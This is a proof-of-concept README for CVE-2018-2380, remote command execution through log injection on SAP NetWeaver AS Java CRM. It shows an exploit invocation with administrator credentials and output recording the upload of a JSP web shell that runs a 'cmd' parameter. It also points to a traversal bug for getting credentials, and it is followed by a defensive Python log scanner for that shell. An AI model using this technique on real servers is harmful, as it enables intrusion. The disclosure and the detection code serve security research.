erpscanteam / CVE-2018-2380

Licence: other
PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM

CVE-2018-2380 (CVSS v3 Base Score: 6.6/10)

PoC of Remote Command Execution via Log injection on SAP NetWeaver AS JAVA CRM

Script usage example

python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

Where --host is the SAP server IP and --port is the SAP NetWeaver AS Java port. The username and password of an SAP administrator can be obtained using the SAP Redwood directory traversal vulnerability.

Example script usage output

C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true

 _______  _______  _______  _______  _______  _______  _
(  ____ \(  ____ )(  ____ )(  ____ \(  ____ \(  ___  )( (    /|
| (    \/| (    )|| (    )|| (    \/| (    \/| (   ) ||  \  ( |
| (__    | (____)|| (____)|| (_____ | |      | (___) ||   \ | |
|  __)   |     __)|  _____)(_____  )| |      |  ___  || (\ \) |
| (      | (\ (   | (            ) || |      | (   ) || | \   |
| (____/\| ) \ \__| )      /\____) || (____/\| )   ( || )  \  |
(_______/|/   \__/|/       \_______)(_______/|/     \||/    )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380


[!] Try to get RCE using log injection
[!] Get j_salt token for requests
[!] Login to the SAP portal
[!] Change log path
[!] Upload "Runtime.getRuntime().exec(request.getParameter("cmd")) " shell to https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig
[!] Restore logs path to ./default_log_name.log
[!] Enjoy!

C:\exploits\SAP>
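
A defender-side check for the artifact visible in the output above, as an added example that is not part of the original repository: it scans HTTP access-log lines for requests to a JSP carrying a cmd parameter and rates the ERPScan_shell_<number>.jsp file name as high severity. The Common Log Format layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: access-log lines in Common Log Format; adapt REQUEST_RE to the
# layout of the HTTP access log you actually collect.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# File name pattern taken from the PoC output above: ERPScan_shell_31275.0.jsp
POC_NAME_RE = re.compile(r"^ERPScan_shell_\d+(\.\d+)?\.jsp$", re.IGNORECASE)

def classify(line):
    """Return None, or (severity, path, cmd_value, status) for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = unquote(url.path)
    name = path.rsplit("/", 1)[-1]
    if not name.lower().endswith(".jsp"):
        return None
    # parse_qs URL-decodes names and values, so "%63md=" is seen as "cmd=".
    params = {k.lower(): v for k, v in
              parse_qs(url.query, keep_blank_values=True).items()}
    poc_name = bool(POC_NAME_RE.match(name))
    if not (poc_name or "cmd" in params):
        return None
    severity = "high" if poc_name else "review"
    # A 200 status means the JSP exists and answered; a 404 is only a probe.
    return severity, path, params.get("cmd", [""])[0], int(m.group("status"))

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample input (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.5 - - [01/Mar/2018:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '192.0.2.9 - - [01/Mar/2018:10:02:13 +0000] '
    '"GET /ERPScan_shell_31275.0.jsp?cmd=ipconfig HTTP/1.1" 200 812',
    '192.0.2.9 - - [01/Mar/2018:10:02:40 +0000] '
    '"GET /status.jsp?%63md=ipconfig HTTP/1.1" 200 64',
    '192.0.2.7 - - [01/Mar/2018:10:03:00 +0000] '
    '"GET /help/index.jsp?topic=login HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for severity, path, cmd, status in scan(SAMPLE_LOG):
        print(f"{severity:6} status={status} path={path} cmd={cmd!r}")
```

A hit with status 200 is worth correlating with changes to the log path setting shortly before it, since the PoC output shows the path being changed and then restored.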